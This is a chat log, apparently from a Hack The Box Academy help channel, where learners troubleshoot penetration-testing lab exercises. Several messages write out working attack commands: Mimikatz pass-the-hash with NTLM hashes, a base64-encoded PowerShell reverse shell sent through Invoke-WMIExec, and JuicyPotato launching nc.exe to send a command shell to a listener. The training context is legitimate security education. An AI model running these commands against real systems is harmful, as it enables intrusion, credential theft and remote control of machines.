but the random high port is just a map
#modules
sly dome
frozen mesa
Explain please,since it is hacking WP module...
frozen mesa
Useful info, thanks!
onyx wing
When I try to ssh to the IP HTB gives me from within the machine it just lags out.
heavy marsh
Still having trouble with pass the hash question: "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?" I ran the command "mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /rc4:30B3783CE2ABF1AF70F77D0660CF3453 /domain:. /run:cmd.exe" exit" and just got another shell with the same administrator access. How do I dump the hashes? Yesterday I did "sekurlsa::logonPasswords full" with mimikatz, but that is something I googled outside of the lesson. What methodology is intended based on the curriculum here. I feel like I'm missing something.
sly dome
thats the command you need
mimikatz is a part of the curriculum
and googling about its possibilities is another
heavy marsh
It seemed like a familiar command but I can't remember what module it was in previously.
sly dome
its not
heavy marsh
I was trying to go back and review
heavy marsh
Well that makes me feel better
I thought I was taking a shortcut by using that command because it's something I googled. I thought there was another methodology that I was missing in the curriculum.
sly dome
madf0x said it was taught in the module but i think he is missing it
heavy marsh
Yeah, that's why I searched the previous modules.
next bronze
pretty sure sekurlsa::logonPasswords is taught in cpts, can't remember which module it was tho
heavy marsh
Thanks for the help. I just wish there was a flag to tell you that part of the solution is not included in the curriculum.
sly dome
pretty sure `sekurlsa::logonPasswords` is taught in cpts, can't remember which m...
it is not π
heavy marsh
I looked pretty hard!
next bronze
ah I see
fathom pendant
next bronze
either way there are multiple ways to dump LSASS, logonPasswords is just one of the more popular ways to do that
fathom pendant
Crazy
sly dome
?
fathom pendant
Literally at the top of the PtH section
sly dome
either way there are multiple ways to dump LSASS, `logonPasswords` is just one o...
wdigest
fathom pendant
i think you are missing the context
About the pth command?
heavy marsh
I did that, it just gave me another shell of the same user.
I was trying to dump hashes.
heavy marsh
I've got it though, thanks MarcieLee
I thought that the command was in a previous lesson, I ended up having to google it to find the sekurlsa::logonpasswords solution
sly dome
Yeah I didn't use mimikatz
pypykatz?
heavy marsh
I almost tried that.
sly dome
just try
heavy marsh
I already got the hash, so I might come back and play around with that to practice later.
heavy marsh
I just tried " sekurlsa::pth /user:David /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:\DC01\ /run:cmd.exe" on the next question and I'm getting the same MS01 administrator shell.
for the next question:
Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
sly dome
why would you get a different shell than MS01
that command only gives you access to David network share
heavy marsh
Is the command right? I can't get into DC01 share with "dir \dc01\david"
fathom pendant
Is the command right? I can't get into DC01 share with "dir \\dc01\david"
When doing the smb double backslash just wrap it in backticks
sly dome
I just did the lsass dump from command line iirc
yea then you need to read it π€£
fathom pendant
yea then you need to read it π€£
It's been a hot minute since I did this module
sly dome
huh
fathom pendant
Domain Controller
rustic sage
does someone now how can i get 30 cubes?
heavy marsh
Whatever this means
rustic sage
`type \\dc01\david\david.txt`
do you maybe now how i can get 30 cubes?
next bronze
complete modules
fathom pendant
do you maybe now how i can get 30 cubes?
Pay for them
rustic sage
Pay for them
yea but i dont have a credit card
sly dome
HAHAHAA
heavy marsh
`type \\dc01\david\david.txt`
Thank you!
sly dome
Whatever this means
remember smbclient commands
heavy marsh
remember smbclient commands
Ah, I'll try that too.
sly dome
you connect to a share which in this case is \DC01\david but in this case you have to use absolute paths since you are not in an interactive console under the network share
its only a trick mimikatz does
actually the domain is inlanefreight.htb btw
DC01 is a security principal, in this case a computer (a special one called Domain Controller)
sly dome
spoilers remove it please
.
double check the source you got and find out the naming scheme
heavy marsh
On question: "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt."
I ran the commands but did not get anything on my listener
Am I using the target IP for all of these?
I'm confused.
Am I supposed to have two RDP sessions open?
Is there another IP address I have to enumerate?
rustic sage
On question: "Using Julio's hash, perform a Pass the Hash attack, launch a Power...
what section is it?
heavy marsh
passthehash in password attacks
Am I supposed to use the IP from the lesson content?
rustic sage
double check the source you got and find out the naming scheme
yeah i cant get the source code back now
rustic sage
Am I supposed to use the IP from the lesson content?
idk i cant remember been a few weeks since i did this module
im pretty sure its an ip u find on the domain
next bronze
Am I supposed to use the IP from the lesson content?
DC01 is supposed to connect to MS01, the machine you RDP'ed into, catch the shell with nc
rustic sage
the one in the top is just for rdp no?
sly dome
yeah i cant get the source code back now
skill issue??
heavy marsh
started a netcat listener and then did this:
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAyADkALgAyADAANAAuADIAMwAiACwAOAAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
sly dome
we dont need all the base64 here
heavy marsh
I just want to make sure my shell is correct.
rustic sage
skill issue??
nah i got it lol
heavy marsh
I did the same type of reverse shell as in the lesson and then used the IP from the target machine that I've been using for the whole lab
sly dome
I just want to make sure my shell is correct.
my eyes dont decode base64 up to today
nah
heavy marsh
and I used port 8001.
sly dome
the network is a 172 one
heavy marsh
Yeah, I don't have that IP
sly dome
ms01 and dc01 are connected trough internal
fathom pendant
Ipconfig
sly dome
Yeah, I don't have that IP
find it π€£
heavy marsh
I have a 10.129 one
sly dome
problem -> solution
heavy marsh
Provided by the lab
next bronze
problem -> solution
lmao
next bronze
this technique works 100% of the time
fathom pendant
Provided by the lab
Yes but when you sign in you have ways of finding it
rustic sage
@sly dome what do u mean naming scheme
sly dome
<@336670667254792194> what do u mean naming scheme
the files are stored with a certain naming scheme under the folder you mentioned (the spoiler)
rustic sage
the files are stored with a certain naming scheme under the folder you mentioned...
ahhhhhhh i see now thanks
sly dome
any time
heavy marsh
okay so I used ipconfig and found two ips, one was the one provided and one was a 172 ip that worked
still doesn't make sense though, how do I have two IPs?!
fathom pendant
still doesn't make sense though, how do I have two IPs?!
...
next bronze
because the machine has two network interfaces
... did you do the foundation modules?
fathom pendant
Networking is wild
heavy marsh
Yeah, I did. What do those two IPs represent?
fathom pendant
... did you do the foundation modules?
Wait till he realizes he has 2 networks on his vm when he does ip a
fathom pendant
Yeah, I did. What do those two IPs represent?
Different subnets
heavy marsh
I'm also not sure what they're talking about when they say "the target machine, DC01, can only connect to MS01"
Yeah I understand IPs in that sense, I'm just trying to figure out why there would be two in this case on this machine. They only gave one in the lab
fathom pendant
Because DC01 is only on the 172 subnet, ms01 is on the tunnel subnet and 172
sly dome
still doesn't make sense though, how do I have two IPs?!
I have 7 on my work computer lmao!
its like you are part of different and unrelated human communities
fathom pendant
You can't directly get to DC01 from your attack machine, you need a middle man
next bronze
Yeah I understand IPs in that sense, I'm just trying to figure out why there wou...
the one they gave lets you connect to MS01, the other one is intranet with DC01 inside
heavy marsh
tunnel subnet being the subnet of the IP I was given for the lab?
fathom pendant
tunnel subnet being the subnet of the IP I was given for the lab?
Yes the 10.x.x.x
heavy marsh
Okay, makes sense now, wish that would have been explained in the module. Thanks for the clarification!
sly dome
DC01 knows the way (route) to MS01 because they share a router in the 172 network
fathom pendant
The 172.16.x.x is the internal network
sly dome
and the machine I am RDPed into is the MS01?
yes it is sie
sir
but MS01 also has a 172 one
fathom pendant
172 is usually like 172.14-16.x.x
sly dome
were calling it β172β because at least I dont remember the exact CIDR
heavy marsh
were calling it β172β because at least I dont remember the exact CIDR
Yeah I understand
fathom pendant
were calling it β172β because at least I dont remember the exact CIDR
Same
sly dome
MS01 has 2 ips, DC01 has only 1
heavy marsh
So I was connected to MS01 and got a reverse shell from DC01
fathom pendant
Yes
heavy marsh
Okay
sly dome
itβs configured like that because is the same lab than the AD module
sly dome
you can always redirect that to your local Parrot/Kali
fathom pendant
heavy marsh
So the 10.129 ip was just my VPN ip, in a real engagement there may only be the 172 correct?
heavy marsh
https://tenor.com/view/if-you-think-of-an-gif-20132469
π
sly dome
in a real engagement can be all different
heavy marsh
Love it
sly dome
better understand the underlying of networking
fathom pendant
Most networked systems have 2-3 ip, the higher up the chain the less it needs to reach out to delegate
heavy marsh
Yeah, I think the confusion was that I was under the impression that the DC01 was also on my 10.129 network
so I had used that IP for my reverse shell
sly dome
happens
heavy marsh
nothing in the module triggered me to think about another ip
sly dome
yes something did
heavy marsh
I mean, seeing the 172 ip was confusing but I thought it was just an example
sly dome
βthe target machine can only connect to MS01β
sly dome
meaning that target machine and you are in separate networks
fathom pendant
Networked systems
fathom pendant
Any time you need to interact with another machine from the initial system
heavy marsh
and very patient
sly dome
Well thanks for the help Rafa and Marcie!!! Y'all are great!
any time!
fathom pendant
It's always a different ip
sly dome
we have been where you are π€£
heavy marsh
before HTB I did the complete begginer and offensive pentesting modules on TryHackMe
sly dome
networking is an abstract concept and can be hard to get
heavy marsh
so that's pretty much my background besides Network+
sly dome
HTB actually places a rather medium to high level in every content they deliver
fathom pendant
I have server+
heavy marsh
I have server+
That one's not easy from what I hear!
sly dome
which is good but it takes effort and time to be successful at HTB related stuff
fossil prairie
hi. I don't get it. Why need a separate account for HTB main if I already had academy set up? π
sly dome
hi. I don't get it. Why need a separate account for HTB main if I already had ac...
theyre working on SSO already
for now its what its
fossil prairie
fair then
shrewd hazel
On the Getting Started module, Public Exploits section. I was able to use nmap with the version scan to see the open ports. now i am trying to find the right exploit within msfconsole but just missing something. the hint says search exploit plugin which i did but cannot find right one, any idea?
sorry, think i should ask this in the community help, my bad
next bronze
sorry, think i should ask this in the community help, my bad
no this is the right place for academy module stuff
you should search for the services and their version, use searchsploit like the example
shrewd hazel
you should search for the services and their version, use `searchsploit` like th...
i am trying that "searchsploit ssh 8.4"
but the hint part is throwing me off
grand kelp
Is there anyone that can help me with the Module: AD Enumeration & Attacks - Skill Assessment Part 2. Feel like Iβm going crazy
Question about getting the administrator account on MS01. Question 8.
next bronze
Is there anyone that can help me with the Module: AD Enumeration & Attacks - Ski...
just ask
grand kelp
I'm on the SQL01 server as SYSTEM. I tried a bunch of different ideas and thought the best way to move to MS01 would be to capture the hash of the administrator now that I have SYSTEM and try to login with the access. I did this and cannot pass the hash, break the hash, etc.
Looking to know if I am in the wrong direction or if I'm doing something wrong
next bronze
I'm on the SQL01 server as SYSTEM. I tried a bunch of different ideas and though...
been a while since I've done that module, but enumerate the rights of the users you have credentials to
grand kelp
Alright, back to the drawing board. Thanks for the nudge
grand kelp
been a while since I've done that module, but enumerate the rights of the users ...
Got it, staring me in the face the whole time. Thank you!
fringe crystal
Hello everyone, what are the personal instances on the HTB VIP+ subscription ?
fathom pendant
Hello everyone, what are the personal instances on the HTB VIP+ subscription ?
Not the right place to ask lol vip+ is separate from academy
fringe crystal
Yeah I just noticed that I am in the wrong place π Sorry
shrewd hazel
after making a post in community-help area, do we close it when done? i did but then it disappeared, wnated to check and thank you for the help @next bronze and @fathom pendant !
fathom pendant
after making a post in community-help area, do we close it when done? i did but ...
When you close it it basically hides it from active but it's still archived
compact jacinth
hi im doing web proxies and doing the question
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
I really dont get it? i have tried getflag=true and GET /lucky.php?/getflag=true HTTP/1.1 dont get what im doing wrong
sleek epoch
have you tried inserting path in ?=/path/flag.txt ?
thorn urchin
hi im doing web proxies and doing the question
The /lucky.php page has a button ...
You literally need to get lucky
Im not memeing
slender shoal
lmao
sly dome
hi im doing web proxies and doing the question
The /lucky.php page has a button ...
while true; do something; done | grep something
calm relic
HELP on password cracking using mutations
thorn urchin
sly dome
under the AD module, ACL abuse: they are asking to add certain user to a group but the user is in the group already (???)
wtf?
twilit panther
Hi there, may I ask few questions:
- If I bought the silver plan (1 year) would I get 1 exam voucher per payment period or per year?
- Does it unlock all modules for free without the need of cubes?
twilit panther
https://dontasktoask.com
Thanks lol
hallow kiln
unless it's an exercise question, it's just an example of how to do it
sly dome
its an exercise indeed
Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
i think every step is intended to get done
hallow kiln
I checked my notes, I did it with PowerShell, never got an error message saying they're in it, but essentially the exercise part starts from adding the SPN
sly dome
ok ok
but if you did it
why i dont have to ?
it should be the same scenario unless someone else is in the same lab than me and added it before i did
hallow kiln
I just think they were always already added there, it's just that powershell doesn't throw an error while net rpc does
sly dome
ahh okok
even in BloodHound its shown as an user of the group
and my BH data is from days ago
oblique spoke
Hello I got stucked at Academy: Attacking Common Services | Attacking DNS, i got the subdomains but doesnt know where to go from here. Is there any tip? Thank you in advance
hallow kiln
but the exercise itself starts from adding a fake SPN, just because a step is shown in the module, doesn't mean it must be repeated
hallow kiln
I mean, is net rpc even in that section
sly dome
nope
hallow kiln
then the exercise is phrased just fine
sly dome
my point is that they should state that the steps to reproduce are starting at the SPN part
its nothing related to the tool you use
hallow kiln
you can reproduce the section without issues if you're using powershell
hallow kiln
worked fine for me π€·
sly dome
okey then my lab is altered by somebody else
but is weird because my BH data is:
and this data is from 2 days ago
analog dock
` Work through the examples in this section to gain a better understanding of AC...
This is talking about adunn, not damundsen right
sly dome
its talking about follow all the examples in the section
wdym?
one example is not doable at least in my lab since it is already done !
analog dock
Work through the examples to gain understanding, but do it for adunn to complete the question. Thatβs how I read it right now
Could be wrong
acoustic owl
Hello I got stucked at Academy: Attacking Common Services | Attacking DNS, i got...
Find all entries
sly dome
worked fine for me π€·
yea powerview
i should try resetting the lab at this point π
but im confused a lot by what my bloodhound shows, that data was collected some days ago
hallow kiln
you can just complete it, you clearly understand what's being done
oblique spoke
Find all entries
thanks
sly dome
i know but i am mad now
sly dome
you can just complete it, you clearly understand what's being done
i will just ignore it
i get how its done
that's all
hallow kiln
and there's always #858470491676737536, if it's legit a mistake, they can fix it
sly dome
i will consider; thanks arth0s always a pleasure
hallow kiln
not gonna lie, I've found some stuff and couldn't bother reporting them
sly dome
same, but its fun to discover extra stuff and try to understand
twilit panther
Does HTB have sales on subscriptions?
fathom pendant
Not usually, only ever real seen the occasional seasonal promo on silver annual but thats abt it
twilit panther
Ooo oki, I wonder if there will be one for Black Friday, it seems like a good deal
twilit panther
You can currently win a subscription
I am hoping, starting fresh on my journey for the sec+
Thanks :)
sly dome
what takes longer: password attacks mutation section or DCSync attack over 2000 users domain?
HAHAHAHAHA
supple patio
thorn urchin
what takes longer: password attacks mutation section or DCSync attack over 2000 ...
Honestly unless youre doing a password audit theres no reason to DCSync the entire DB
sly dome
Honestly unless youre doing a password audit theres no reason to DCSync the enti...
it is asking for certain cleartext password
i dont know the username
thorn urchin
well, then you are indeed doing a password audit on the whole DB π
thorn urchin
So my point is still correct
sly dome
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
maybe i can use that
to get the user(s) samaccountname
XD
thorn urchin
so you already have the hash and just need the username?
thorn urchin
but what do you HAVE
thorn urchin
You skipped a part
sly dome
Viewing an Account with Reversible Encryption Password Storage Set this?
thorn urchin
Reversible encryption set is a specific setting
you can search for that setting to get the user
thorn urchin
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
should be the same
thorn urchin
Ye just saying what I have in my notes
Much easier than just DCSync the entire domain. Though it WOULD work too
sly dome
yes it worked haha
thorn urchin
since impacket separates a sep file for that permission
heavy marsh
Getting an error on PtT module when trying to RDP with the supplied credentials: The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
I reset and tried /cert-ignore, and that did not work either.
sly dome
since impacket separates a sep file for that permission
thx for the collaboration mate
thorn urchin
np
heavy marsh
using command: xfreerdp /v:10.129.133.178 /u:Administrator /p:AnotherC0mpl3xP4$$ /dynamic-resolution
sly dome
yea but you are using AnotherC0mpl3xP4
sly dome
so 'AnotherC0mpl3xP4$$'
yes
heavy marsh
Oh! got it. Thanks!
sly dome
any time
heavy marsh
That did the trick!
soft plume
Hi I'm currently working on the "Firewall and IDS/IPS Evasion Hard-lab" in the NMAP enumeration module and I found a bunch of different ports but I don't know which to use for my --source-port #, and I searched online people specifically picking 53, is there reason behind that?
Like all the other ones it's also filtered, I'm confused on why specifically are people picking that port over the other ones
sly dome
the victim host allows inbound connections coming from 53 for DNS reasons
itβs explained in the module
soft plume
Where at?
rustic sage
hey guys is there have any roadmap in hackthebox
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
rustic sage
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-...
hmm
soft plume
I see what you meant, sorry I was just very confused on the wording thanks for your help
thorn urchin
That did the trick!
gotta remember that things like !,$,( etc are special characters that the bash terminal interpreta before the application receives it
soft cedar
Can I pm you?
soft plume
go for it
supple sparrow
got stuck at Attack Enterprise Network - Lateral Movement. couldn't connect to MS01 via evil-winrm, tried both portfwd and reverse portfwd and get WinRMAuthorizationError
been following the walkthrough too
thorn urchin
got stuck at **Attack Enterprise Network - Lateral Movement**. couldn't connect ...
either your logon creds are bad or your user doesnt have perms
supple sparrow
yea imma try harder ig
supple sparrow
got stuck at **Attack Enterprise Network - Lateral Movement**. couldn't connect ...
I can't F read lol 
thorn urchin
Happens
hollow dagger
Hi there, hoping someone can help me out with the Using CrackMapExec : Skill Assessment. I think I'm just doing something silly and can't get any accounts. I can find three hosts but when I try to brute force the rids, I don't get anything. I reckon I've configured something wrong in my hosts file or am missing a particular tag in my commands...any pointers?
runic remnant
can anyone help with attacking DNS?
vital adder
hint same api as the one you found the uid
vital adder
Hi there, hoping someone can help me out with the *Using CrackMapExec : Skill As...
sure shoot me a dm if you still need help
vital adder
can anyone help with attacking DNS?
what's the issue?
runic remnant
what's the issue?
Ive been doing this question for so long and I found a HTB{} flag but when I put it in, it says its wrong
idek what to do anymore
vital adder
Ive been doing this question for so long and I found a HTB{} flag but when I put...
shoot me a dm with that flag, i'll check it for y'all
heavy marsh
ptt from linux password for user david is not working
I'm doing: ssh david@<ip> -p 2222
I have inlanefreight.htb in my /etc/hosts file with the appropriate IP as well
vital adder
the domain at the end is a part of the username
heavy marsh
lol, yeah I just saw that as I read further. I was trying to start the machine before I got into the lab material.
Just not used to that method. Should I take it out of my /etc/hosts?
vital adder
i don't think that matter for this part but it could for some of the later attack on that section
heavy marsh
I tried 19700 and 150
The list on the hashcat site is horrible!
Also, is there an easier way to find this?
I can't find AES-256 modes for hashcat or john
Looks like it should be 19700 based on https://hashcat.net/wiki/doku.php?id=example_hashes
thorn urchin
why are you trying to crack that one
youve imported the keytab file, just use it to get a kerberos ticket
heavy marsh
The question is asking for me to get credentials and then authenticate via SSH.
Is there a mode for that in john the ripper or hashcat?
hidden nebula
heavy marsh
why are you trying to crack that one
Nevermind, there was another keytab file in the folder with an NTLM hash. Cracked it.
rotund urchin
anyone do SeDebugPrivilege module recently? I logged into the box with the creds provided, but the user does not have the priviliges for the attack
heavy marsh
and it's asking me for a password
I thought the point of this was to avoid using a password.
fathom pendant
<@&861185840277487616> 
thorn urchin
Brother in idiocy there are FBI agents in this chat
fathom pendant
This is actually facts
olive cape
Hey all, does it matter if i run kali or parrot when doing the modules? is there anything linked to the parrot sec os to htb website? or will it be fine to use kali?
rustic sage
Whatβs the difference between fortresses and pro labs?
I get one is paid and one is rank based but what is fortress really doing different
thorn urchin
Hey all, does it matter if i run kali or parrot when doing the modules? is there...
If you have even a couple of braincells it will be fine
slender shoal
<@&861185840277487616> <:4head:1079326290206793809>
its the red role day
olive cape
If you have even a couple of braincells it will be fine
was just making sure, as i really didnt want to change os, wasnt sure if i needed it specifically to access the vms from it etc.
thorn urchin
nah you good
olive cape
sweet as cheers π
quick magnet
hi im facing same problem, how u solve this ?
can u give me hint ?
oblique spoke
Hi! I got stuck with Attacking Common Services, Attack DNS.
I found a few subdomains, but i dont know where to go from here. Tried dig without any luck. Can someone show me some direction?
hazy grotto
DId you try running subrute?
oblique spoke
DId you try running subrute?
yes
hazy grotto
What did oyu get for a result?
boreal crest
Heyo! Anyone know how to reset bloodhounds db in the community edition?
oblique spoke
What did oyu get for a result?
alpine drum
Hi. Please can someone help me. I am doing the Getting Started Module and at the end of it, there is a Nibbles walkthrough. If I wanted to do this on my own parrot VPN, do I use openvpn with the academy VPN details OR the HTB main site VPN details (as the box is on the main site [I have a lab ovpn file as well as the starting point ovpn ). I am just unsure which one to use. Thank you
hazy grotto
try inlanefreight.htb
next bronze
hi im facing same problem, how u solve this ?
can u give me hint ?
did you write into all writeable shares?
next bronze
Heyo! Anyone know how to reset bloodhounds db in the community edition?
that's the neat part, you don't
seriously, there's no official feature to clean the db yet
oblique spoke
try inlanefreight.htb
i treid
quick magnet
did you write into all writeable shares?
yes i put .scf file in b* folder
boreal crest
that's the neat part, you don't
yes but when I restart the docker instance it keeps the db info, inless i remove it and readd I guess
oblique spoke
Nvm i can't dm you
why?
oblique spoke
Says we have to be friends or something?
alright i need to change my settings
next bronze
yes but when I restart the docker instance it keeps the db info, inless i remove...
you can, however, remove the docker volume, but don't blame me if it breaks something, works for me at least:
docker container ls
# find the container that ends with "graph-db-1"
docker container rm <that container>
docker volume rm $(docker volume ls -q | grep neo4j-data)
lmao bet Ill try that, good thing with docker is if it breaks I can always restart it
next bronze
worst thing that can happen is you'll need to reinstall the whole thing I guess, but shouldn't be a big deal
boreal crest
worst thing that can happen is you'll need to reinstall the whole thing I guess,...
Thats interesting that bloodhound devs didnt account for this at all.
next bronze
yes i put .scf file in b* folder
I don't remember the exact steps but put it into all writeable shares, then wait a while in responder, if you still don't see it, restart the target
next bronze
Thats interesting that bloodhound devs didnt account for this at all.
yep I don't understand why this isn't some of the first features to be implemented, hopefully they will add that soon
quick magnet
I don't remember the exact steps but put it into all writeable shares, then wait...
solved, thanks
umbral fulcrum
Hey Guy I didn't understand juicy-potato, maybe someone can explain it a bit better
how do I choose the COM server listening port??
in the module they just did -l 53375, but Y did they choose this one ??
regal walrus
I am 12 yrs don ban me pls
umbral fulcrum
cuase when I do "netstat -ano" I C alot of ports
but when I choose some other it doesn't work
I'm doing the "Windows Privilege Escalation Skills Assessment - Part I"
regal walrus
cuase when I do "netstat -ano" I C alot of ports
but when I choose some other ...
What is this π
umbral fulcrum
I think I can use the juicy potato 4 escalation, but I need a listening port so || netstat -ano ||
but I get error
umbral fulcrum
do U know?
umbral fulcrum
Hey Guy I didn't understand juicy-potato, maybe someone can explain it a bit bet...
ok I think I understand that I need to choose a CLSID, I just don't understand how am I suppose to shoose...
balmy iris
Hi, I have a problem with MacOS module
https://academy.hackthebox.com/module/157/section/1522
I have to give the numeric version running on my machine but there is no lab on this module
(Except the usual parrot one)
Have I to make my own lab in order to do this module ?
next bronze
ok I think I understand that I need to choose a CLSID, I just don't understand h...
each CLSID reperesnts a service that can run as system, just need to find the right one as it can be different from system to system
umbral fulcrum
each CLSID reperesnts a service that can run as `system`, just need to find the ...
yes but there r to many
got 1 that say :
[+] CreateProcessWithTokenW OK
not sure how 2 continue now
next bronze
Hi, I have a problem with MacOS module
https://academy.hackthebox.com/module/157...
I don't have a mac but I've finished this module somehow, I think any version works?
next bronze
not sure how 2 continue now
if you have gui access, it should pop a system shell, if you don't, use nc to send a system shell to your listener
balmy iris
I don't have a mac but I've finished this module somehow, I think any version wo...
hmm funny, thanks
umbral fulcrum
if you have gui access, it should pop a system shell, if you don't, use nc to se...
but that doesn't give me much
since I get the same user...
normal zodiac
Hello, I'm not sure where I'm supposed to ask this question. I'm relatively new to HTB and wanted to clarify this small doubt.
I expected a result containing which port the IP was running on but I couldn't see any open ports in it.
(Scanning the Meow HTB)
I ran the command
nmap -F -Pn {ip}
I got
Host is up.
All 100 scanned ports on {ip} are in ignored states.
Not shown: 100 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
Does anyone know how I could get the ports names listed?
alpine dome
Hi there, I have this POST Request
POST /upload.php HTTP/1.1
Host: 94.237.49.11:44931
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------413690872112659765123503892632
Content-Length: 51378
Origin: http://94.237.49.11:44931
DNT: 1
Connection: close
Referer: http://94.237.49.11:44931/
-----------------------------413690872112659765123503892632
Content-Disposition: form-data; name="uploadFile"; filename="pirate.jpg"
Content-Type: image/jpeg
ΓΏΓΓΏΓ JFIFHHΓΏΓC
I want to fuzz for possible allowed upload extentions in the Content-Disposition: Header.
I know how to do that using a Proxy. Does anyone know how to accomplish this using Ffuf?
I have tried something like this ffuf -X POST -u http://94.237.49.11:44931/upload.php -H 'Content-Disposition: form-data; name="uploadFile"; filename="testFUZZ' -H 'Content-Type: application/x-php' -d 'test' -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ but it did not work.
supple patio
but that doesn't give me much
since I get the same user...
How does your full command look like?
umbral fulcrum
How does your full command look like?
|| cmd /c JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Tasks\nc.exe 10.10.15.75 1234 -e cmd.exe" -t * ||
umbral fulcrum
How does your full command look like?
but on the VM I get the same user ...
a bit pointless
next bronze
|| cmd /c JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Wind...
try running potato directly .\JuicyPotato.exe
supple patio
|| cmd /c JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Wind...
You didn't specify here the clsid
umbral fulcrum
You didn't specify here the clsid
||cmd JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Tasks\nc.exe 10.10.15.75 1234 -e cmd.exe" -t * -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"||
umbral fulcrum
You didn't specify here the clsid
I can't send picture but it's the same user...
next bronze
what error are you getting? and what shell do you have that you can't run the potato directly but need to use cmd JuicyPotato.exe
umbral fulcrum
what error are you getting? and what shell do you have that you can't run the po...
can I DM?
next bronze
sure
tidal kelp
Module: File Inclusion
Session: Basic Bypass
On approved paths, it say* "Some web applications may also use Regular Expressions to ensure that the file being included is under a specific path. For example, the web application we have been dealing with may only accept paths that are under the ./languages directory"*
How should I locate accepthed baths for the web app? From the examples in the session, I do not get the same output that are in the examples.
solid escarp
You can explore/crawl the website for valid paths or use a directory busting tool like dirsearch,feroxbuster,gobuster to enumerate valid directories in the same path then use the valid directory before your directory traversal payload
solid escarp
You don't even need to do that though for the example
tidal kelp
ah thx. SHould have thought about that
tidal kelp
You don't even need to do that though for the example
yeah figured that out when I just looked at the URL. Pay attention to the details ^^
placid oyster
Hi how do I learn?
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hardy egret
Hi would someone be able to help me out with File Upload Attacks - Skill Assessment?
Just a little stuck
alpine dome
Hi would someone be able to help me out with File Upload Attacks - Skill Assessm...
Where exactly?
jovial falcon
I need reverse engineer or Crypto skilled player and located or can to travel to saudi arabia to attend the blackhatmea finals
DM Me
candid lily
narrow solar
hey friends, i am almost there, i am at Attacking Enterprise Networks - Web Enumeration & Exploitation, i am not getting the cookie, but getting this response, any hint??
solid escarp
Could you show the JS payload?
